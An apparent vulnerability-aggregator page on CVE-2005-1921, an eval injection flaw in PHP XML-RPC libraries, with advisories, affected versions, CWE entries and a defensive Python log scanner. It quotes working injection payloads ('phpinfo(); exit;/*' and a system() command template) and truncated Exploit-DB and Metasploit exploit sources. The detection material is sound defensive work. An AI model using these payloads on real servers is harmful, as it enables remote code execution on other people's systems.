CVE-2005-1921
Published 2005-07-05
CVE-2005-1921: Eval injection vulnerability in PEAR XML_RPC 1.3.0 and earlier (aka XML-RPC or xmlrpc) and PHPXMLRPC (aka XML-RPC For PHP or php-xmlrpc) 1.1 and earlier, as…
Priority P263 high · 7.5 CVSS 2.0 · AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS 79.07% (99.5th percentile)
Eval injection vulnerability in PEAR XML_RPC 1.3.0 and earlier (aka XML-RPC or xmlrpc) and PHPXMLRPC (aka XML-RPC For PHP or php-xmlrpc) 1.1 and earlier, as used in products such as (1) WordPress, (2) Serendipity, (3) Drupal, (4) egroupware, (5) MailWatch, (6) TikiWiki, (7) phpWebSite, (8) Ampache, and others, allows remote attackers to execute arbitrary PHP code via an XML file, which is not properly sanitized before being used in an eval statement.
Affected (7 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | debian_linux | — | — |
| drupal | drupal | < 4.5.4 | 4.5.4 |
| drupal | drupal | >= 4.6.0 < 4.6.2 | 4.6.2 |
| gggeek | phpxmlrpc | <= 1.1 | — |
| gggeek | phpxmlrpc | <= 1.1.1 | — |
| php | xml_rpc | <= 1.3.0 | — |
| tiki | tikiwiki_cms_groupware | < 1.8.5 | 1.8.5 |
Detection & IOCs (extracted from sources)
- Detect HTTP POST requests to xmlrpc.php containing eval-injection payloads: look for single-quote escape sequences followed by PHP function calls (e.g., passthru, system, phpinfo) and comment terminators (//) in the POST body targeting the XML-RPC string parameter field.
- The exploit payload encodes the command as a chain of chr() calls joined by dots to bypass filtering; detect POST bodies to xmlrpc.php matching the pattern chr(\d+)\.chr(\d+) inside a passthru() or similar call.
- magic_quotes_gpc does not apply to $HTTP_RAW_POST_DATA, so single-quote injection in raw POST XML bodies is not sanitized; monitor for unescaped single quotes in XML-RPC POST data as an evasion indicator.
- Metasploit module php_xmlrpc_eval (unix/webapp/php_xmlrpc_eval) is the canonical exploit module; correlate IDS/WAF logs for this module name or its characteristic random-alphanumeric wrapper strings surrounding command output in HTTP responses.
- Detect the exploit check probe: HTTP POST to xmlrpc.php whose response body contains the literal string 'ownable', indicating active vulnerability scanning with the Metasploit module.
- Look for the sentinel strings '_begin_' and '_end_' in HTTP responses from xmlrpc.php, used by the dukenn exploit to delimit command output.
- The vulnerability affects PEAR XML_RPC 1.3.0 and earlier AND PHPXMLRPC 1.1 and earlier; both libraries must be patched independently as they are separate codebases bundled into many applications (WordPress, Drupal, Serendipity, TikiWiki, etc.).
- The payload space is limited to 512 bytes in the Metasploit module; longer payloads delivered via chr()-encoding chains may exceed this and fail silently.
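The indicators above can be applied mechanically to web-server or WAF logs. The following is an added example, not code from any of the page's sources: a small Python scanner that checks request/response pairs against those patterns. The alternative endpoint path `/xmlrpc/xmlrpc.php`, the list of PHP function names, the IOC labels and the sample traffic are assumptions constructed for the demonstration.

```python
import re

# "/xmlrpc.php" is the path named in the IOC list; the second entry is an assumed
# alternative location and should be adjusted per deployment.
XMLRPC_PATHS = ("/xmlrpc.php", "/xmlrpc/xmlrpc.php")
PHP_CALLS = r"(?:passthru|system|exec|shell_exec|popen|phpinfo)"

# IOC 1: quote closing the eval()ed string, a PHP call, then a comment terminator
# ("//" per the IOC list, "/*" in the published PoC).
EVAL_ESCAPE = re.compile(r"'.*?\)\s*;.*?\b" + PHP_CALLS + r"\s*\(.*?(?://|/\*)", re.S)
# IOC 2: command encoded as a dot-joined chr() chain inside an exec-style call.
CHR_CHAIN = re.compile(r"\b" + PHP_CALLS + r"\s*\(\s*chr\(\d+\)(?:\s*\.\s*chr\(\d+\))+", re.I)
# IOC 3: a raw single quote in the body (magic_quotes_gpc never touched raw POST data).
RAW_QUOTE = re.compile(r"'")
# IOCs 5 and 6: 'ownable' (Metasploit check) and '_begin_'..'_end_' (dukenn) in responses.
RESPONSE_SENTINEL = re.compile(r"ownable|_begin_.*?_end_", re.S)

# Constructed sample traffic, not a real capture: (method, path, body, response).
BENIGN_CALL = ("<methodCall><methodName>demo.sayHello</methodName><params><param>"
               "<value><string>hello</string></value></param></params></methodCall>")
SAMPLES = [
    ("POST", "/xmlrpc.php", BENIGN_CALL, "<methodResponse>ok</methodResponse>"),
    # the GulfTech PoC value quoted on this page, wrapped in a <name> element
    ("POST", "/xmlrpc.php",
     "<methodCall><methodName>test.method</methodName><params><param><value>"
     "<name>','')); phpinfo(); exit;/*</name></value></param></params></methodCall>",
     "<html>PHP Version</html>"),
    # chr()-encoded command inside passthru(), the encoding the IOC list describes
    ("POST", "/xmlrpc.php",
     "<methodCall><methodName>t</methodName><params><param><value><string>"
     "passthru(chr(105).chr(100))</string></value></param></params></methodCall>", ""),
    ("POST", "/comment.php", "name=O'Brien", "ok"),  # other endpoint: never flagged
    ("POST", "/xmlrpc.php", BENIGN_CALL, "_begin_uid=33(www-data)_end_"),  # sentinel reply
]

def scan_exchange(method, path, body, response):
    """Return the IOC names matched by one HTTP request/response pair."""
    hits = []
    if method.upper() != "POST" or path not in XMLRPC_PATHS:
        return hits
    if EVAL_ESCAPE.search(body):
        hits.append("eval-escape")
    if CHR_CHAIN.search(body):
        hits.append("chr-chain")
    if RAW_QUOTE.search(body):
        hits.append("raw-quote")  # weak alone: legitimate strings may contain quotes
    if RESPONSE_SENTINEL.search(response):
        hits.append("response-sentinel")
    return hits

def verdict(hits):
    """Collapse IOC names into one label; a lone raw quote is only 'suspicious'."""
    if any(h in ("eval-escape", "chr-chain", "response-sentinel") for h in hits):
        return "likely-exploit"
    return "suspicious" if "raw-quote" in hits else "clean"

def scan_all(samples):
    return [verdict(scan_exchange(*s)) for s in samples]
```

The raw-quote rule is deliberately kept separate from the verdict because a legitimate string parameter may contain an apostrophe; it is only escalated when combined with one of the stronger indicators.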
CVSS provenance
- nvd · v2.0 · 7.5 HIGH · AV:N/AC:L/Au:N/C:P/I:P/A:P
- vendor_redhat · 7.5 HIGH
GHSA
GHSA-mcp5-3g3r-5wm5: Eval injection vulnerability in PHPXMLRPC 1
ghsa_unreviewed · 2022-05-01 · CVSS 7.5 · CVE-2005-2498 [HIGH] · CWE-94
Eval injection vulnerability in PHPXMLRPC 1.1.1 and earlier (PEAR XML-RPC for PHP), as used in multiple products including (1) Drupal, (2) phpAdsNew, (3) phpPgAds, and (4) phpgroupware, allows remote attackers to execute arbitrary PHP code via certain nested XML tags in a PHP document that should not be nested, which are injected into an eval function call, a different vulnerability than CVE-2005-1921.
GHSA
GHSA-7mjj-9265-43wm: Eval injection vulnerability in PEAR XML_RPC 1
ghsa_unreviewed · 2022-05-01 · CVE-2005-1921 [HIGH] · CWE-94
Red Hat
security flaw
vendor_redhat · 2005-08-14 · CVSS 7.5 · CVE-2005-2498 [HIGH]
Ubuntu
PHP XMLRPC vulnerability
vendor_ubuntu · 2005-07-05 · CVE-2005-1921
A remote code execution vulnerability has been discovered in the XMLRPC module of the PEAR (PHP Extension and Application Repository) extension of PHP. By sending specially crafted XMLRPC requests to an affected web server, a remote attacker could exploit this to execute arbitrary code with the web server's privileges.
In Ubuntu 5.04 (Hoary Hedgehog), the PEAR extension is unsupported (it is contained in the php4-universe package which is part of universe). However, since this is a highly critical vulnerability, that package was fixed as well.
Please note that many applications contain a copy of the affected XMLRPC code, which must be fixed separately. The following packages may also be affected, but are unsupported in U
Red Hat
security flaw
vendor_redhat · 2005-06-29 · CVSS 7.5 · CVE-2005-1921 [HIGH]
No detection rules found.
Exploit-DB
PHPXMLRPC < 1.1 - Remote Code Execution
exploitdb · 2015-07-02 · CVSS 7.5 · CVE-2005-1921 [HIGH]
Vulnerable fragment from PHPXMLRPC (the start of the line is cut off in the extraction):

```php
// Tail of the eval() statement described below: the request's parameter text
// is concatenated straight into PHP source, so a single quote in it ends the
// string literal and whatever follows is evaluated as code.
addParam(' . $_xh[$parser]['params'][$i]. ");");
}
```

By creating an XML file that uses single quotes to escape into the eval() call, an attacker can easily execute PHP code on the target server. This has a lot to do with the fact that magic_quotes_gpc() does not apply to $HTTP_RAW_POST_DATA, so using single quotes is not a problem.

Proof-of-concept request as extracted (method name and parameter value; the surrounding XML-RPC markup was lost in the extraction):

```
test.method
','')); phpinfo(); exit;/*
```

The above XML file, when posted to the vulnerable server, will cause the phpinfo() function call to be executed on the vulnerable server.
Solution:
An updated version of PHPXMLRPC can be downloaded from their official website, and all users are advised to upgrade immediately.
http://sourceforge.net/project/showfiles.php?group_id=34455&package_id=26601
A special thanks to Ed Dumbill, Giunta Gaetano, and all
Exploit-DB
XML-RPC Library 1.3.0 - 'xmlrpc.php' Arbitrary Code Execution (Metasploit)
exploitdb · 2010-07-25 · CVE-2005-1921
Module source as extracted (truncated):

```ruby
##
# $Id: php_xmlrpc_eval.rb 9929 2010-07-25 21:37:54Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'PHP XML-RPC Arbitrary Code Execution',
'Description' => %q{
This module exploits an arbitrary code execution flaw
discovered in many implementations of the PHP XML-RPC module.
This flaw is exploitable through a number of PHP web
applications, including but not limited to Drupal, Wordpress,
Postnuke, and TikiWiki.
},
'Author' => [ 'hdm', 'cazz' ],
'Licens
```
Exploit-DB
PHP Net Tools 2.7.1 - Remote Code Execution
exploitdb · 2006-04-18 · CVE-2006-1921
Exploit source as extracted (truncated):

```perl
#!/usr/bin/perl
# PHP Net Tools Remote Code Execution Exploit
#
# by FOX_MULDER ([email protected])
# Vulnerability found by FOX_MULDER.
#
# "Born to be root !!!"
#----------------------------------+
#PHP Net Tools |
#Copyright (C) 2005 Eric Robertson |
#[email protected] |
#----------------------------------+
#
# Fact:Wbyte counted twice to infinity !!!
#
#
###################################################
use LWP 5.64;
my $hostname = $ARGV[0];
my $dir = $ARGV[1];
my $command = $ARGV[2];
if (@ARGVnew;
$browser->agent('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)');
print "\n\n[+]Sending request to server . . .\r\n";
my $url = "http://$hostname$dir/nettools.php";
my $response = $browser->post( $url,[
'ping' => '1',
'host' => "
```
Exploit-DB
XML-RPC Library 1.3.0 - 'xmlrpc.php' Remote Command Execution (3)
exploitdb · 2005-07-04 · CVE-2005-1921
Exploit source as extracted (truncated):

```perl
#!/usr/bin/perl -w
# ********************************************************
# XML-RPC Remote Command Execution Exploit By Mike Rifone
# ********************************************************
# This works on da phpxmlrpc, and da PEAR XML_RPC too! All
# you need is to put the url to the server and u get shell
# Dis is my first exploit but hey it works :D ~Mike@Rifone
# ********************************************************
use LWP::UserAgent;
$brws = new LWP::UserAgent;
$brws->agent("Internet Explorer 6.0");
$host = $ARGV[0];
if ( !$host )
{
die("Usage: xmlrpcexec.pl http://pathto/xmlrpcserver");
}
while ( $host )
{
print "xmlrpc\@\#";
$exec = ;
$data = "foo.bar1111','')); system('$exec'); die; /*";
$send =
```
Exploit-DB
XML-RPC Library 1.3.0 - 'xmlrpc.php' Remote Command Execution (2)
exploitdb · 2005-07-04 · CVE-2005-1921
Exploit source as extracted (truncated):

```perl
#-------------------------------------------------------#
# /| #
# | | #
# | | #
# /\ ________| |___ #
# / \ \_______ __/ #
# / \|\_____ | | _ _ _ _ ()___ #
# / /\ \ ___ \ | | / | | | || \ || | | | #
# / /__\ \| \ || | _ /__ |_ | | ||_/ || | |_| #
# / ______ \ | || || | / | | | || \ || | | #
# / / \ \ | || || | / |_ |_ |_|| \|| | \_| #
# \_/ |\_/ | || || | ___ _ _ #
# | | | || /| | | | | ||\/| #
# \| \||/ \| | |_ |_|| | #
# | | | || | #
# | |_ | || | #
# #
# Original advisory by http://gulftech.org/ #
# Exploit coded by dukenn (http://asteam.org) #
# #
#-------------------------------------------------------
#!/usr/bin/perl
use IO::Socket;
print "XMLRPC remote commands execute exploit by dukenn (http://asteam.org)\n
```
Exploit-DB
XML-RPC Library 1.3.0 - 'xmlrpc.php' Remote Code Injection
exploitdb · 2005-07-01 · CVE-2005-2116
Exploit source as extracted (truncated):

```perl
# tested and working /str0ke
#!/usr/bin/perl
#
# ilo--
#
# This program is no GPL or has nothing to do with FSF, but some
# code was ripped from romansoft.. sorry, too lazy!
#
# xmlrpc bug by James from GulfTech Security Research.
# http://pear.php.net/bugs/bug.php?id=4692
# xmlrpc drupal exploit, but James sais xoops, phpnuke and other
# cms should be vulnerable.
#
# greets: dsr! digitalsec.net
#
require LWP::UserAgent;
use URI;
use Getopt::Long;
use strict;
$| = 1; # fflush stdout after print
# Default options
# connection
my $basic_auth_user = '';
my $basic_auth_pass = '';
my $proxy = '';
my $proxy_user = '';
my $proxy_pass = '';
my $conn_timeout = 15;
# general
my $host;
#informational lines to feed my own ego.
print
```
Metasploit
PHP XML-RPC Arbitrary Code Execution
metasploit
This module exploits an arbitrary code execution flaw discovered in many implementations of the PHP XML-RPC module. This flaw is exploitable through a number of PHP web applications, including but not limited to Drupal, Wordpress, Postnuke, and TikiWiki.
Bugzilla
CVE-2005-1921 security flaw
bugzilla · 2018-08-16 · CVSS 7.5 · CVE-2005-1921 [HIGH]
Flaw bug created to hold information about an old flaw we knew something about. For more details see the MITRE CVE description.
Discussion:
MITRE description:
Bugzilla
CVE-2005-2498 security flaw
bugzilla · 2018-08-16 · CVSS 7.5 · CVE-2005-2498 [HIGH]
Flaw bug created to hold information about an old flaw we knew something about. For more details see the MITRE CVE description.
Discussion:
MITRE description:
CWE
CWE-95: Improper Neutralization of Directives in Dynamically Evaluated Code ('Eval Injection')
mitre_cwe
The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes code syntax before using the input in a dynamic evaluation call (e.g. "eval").
Modes of Introduction:
Phase: Implementation
Note: REALIZATION: This weakness is caused during implementation of an architectural security tactic.
Phase: Implementation
Note: This weakness is prevalent in handler/dispatch procedures that might want to invoke a large number of functions, or set a large number of variables.
Common Consequences:
Scope: Confidentiality. Impact: Read Files or Directories, Read Application Data. The injected code could access restricted data / files.
Scope: Access Control. Impact:
CWE
CWE-94: Improper Control of Generation of Code ('Code Injection')
mitre_cwe
The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment.
Modes of Introduction:
Phase: Implementation
Note: REALIZATION: This weakness is caused during implementation of an architectural security tactic.
Common Consequences:
Scope: Access Control. Impact: Bypass Protection Mechanism. In some cases, injectable code controls authentication; this may lead to a remote vulnerability.
Scope: Access Control. Impact: Gain Privileges or Assume Identity. Injected code can access resources that the attacker is directly prevented from ac
References
- http://marc.info/?l=bugtraq&m=112008638320145&w=2
- http://marc.info/?l=bugtraq&m=112015336720867&w=2
- http://marc.info/?l=bugtraq&m=112605112027335&w=2
- http://pear.php.net/package/XML_RPC/download/1.3.1
- http://secunia.com/advisories/15810
- http://secunia.com/advisories/15852
- http://secunia.com/advisories/15855
- http://secunia.com/advisories/15861
- http://secunia.com/advisories/15872
- http://secunia.com/advisories/15883
- http://secunia.com/advisories/15884
- http://secunia.com/advisories/15895
- http://secunia.com/advisories/15903
- http://secunia.com/advisories/15904
- http://secunia.com/advisories/15916
- http://secunia.com/advisories/15917
- http://secunia.com/advisories/15922
- http://secunia.com/advisories/15944
- http://secunia.com/advisories/15947
- http://secunia.com/advisories/15957
- http://secunia.com/advisories/16001
- http://secunia.com/advisories/16339
- http://secunia.com/advisories/16693
- http://secunia.com/advisories/17440
- http://secunia.com/advisories/17674
- http://secunia.com/advisories/18003
- http://security.gentoo.org/glsa/glsa-200507-01.xml
- http://security.gentoo.org/glsa/glsa-200507-06.xml
- http://security.gentoo.org/glsa/glsa-200507-07.xml
- http://securitytracker.com/id?1015336
- http://sourceforge.net/project/showfiles.php?group_id=87163
- http://sourceforge.net/project/shownotes.php?release_id=338803
- http://www.ampache.org/announce/3_3_1_2.php
- http://www.debian.org/security/2005/dsa-745
- http://www.debian.org/security/2005/dsa-746
- http://www.debian.org/security/2005/dsa-747
- http://www.debian.org/security/2005/dsa-789
- http://www.drupal.org/security/drupal-sa-2005-003/advisory.txt
- http://www.gulftech.org/?node=research&article_id=00087-07012005
- http://www.hardened-php.net/advisory-022005.php
- http://www.mandriva.com/security/advisories?name=MDKSA-2005:109
- http://www.novell.com/linux/security/advisories/2005_18_sr.html
- http://www.novell.com/linux/security/advisories/2005_41_php_pear.html
- http://www.novell.com/linux/security/advisories/2005_49_php.html
- http://www.redhat.com/support/errata/RHSA-2005-564.html
- http://www.securityfocus.com/archive/1/419064/100/0/threaded
- http://www.securityfocus.com/bid/14088
- http://www.vupen.com/english/advisories/2005/2827
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11294
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A350